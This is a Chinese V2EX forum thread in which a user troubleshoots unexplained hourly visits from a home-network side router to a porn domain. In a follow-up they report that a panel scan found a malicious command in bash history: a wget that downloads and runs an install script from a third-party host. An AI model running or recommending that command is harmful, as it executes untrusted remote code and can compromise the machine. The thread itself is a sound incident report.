V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
pinyoung
V2EX  ›  问与答

局域网抓包网关莫名其妙访问频繁色情网站?

  •  
  •   pinyoung · 33 天前 · 276 次点击
    这是一个创建于 33 天前的主题,其中的信息可能已经有所发展或是发生改变。
    主路由抓到 旁路由 openwrt 总是每个小时随机访问 www.whnb7000.net 的任意一个 html 网址,且每个网址都不一样,但是都能打开,一个小时最少访问 5-8 次,不理解

    因为是旁路由,如果局域网设备走旁路由分流,抓出来就是旁路由访问,不在旁路由范围内,就显示原来的设备,所以不好判定。

    局域网装了 pve ,虚拟了好几个系统,运行了好多个服务,更不好判定。。。

    这个域名套了 CF ,创建日期: 2025-06-02T07:35:21Z

    有什么办法思路抓出来这个吗?

    whnb 是不是我很牛逼?像是在炫耀,把设备被黑了?

    呜呜呜,暂时没有看出来设备的 cpu 与内存占用异常,求解!
    pinyoung
        1
    pinyoung  
    OP
       33 天前
    只要是旁路由访问的,源什么的全都算在了旁路由头上,没有什么思路查什么设备,害
    pinyoung
        2
    pinyoung  
    OP
       33 天前
    14:17 update:暂时锁定是 ubuntu 上的服务,不知道跟宝塔开心版也没有关系
    pinyoung
        3
    pinyoung  
    OP
       33 天前
    21:24 update:抓包写了脚本也抓不出来,宝塔更新正版后提示发现/root/.bash_history 中存在恶意命令反弹 shell 类:wget -O install.sh http://bt.cxinyun.com/install/install_6.0.sh && bash install.sh
    关于   ·   帮助文档   ·   自助推广系统   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1482 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 16:37 · PVG 00:37 · LAX 09:37 · JFK 12:37
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.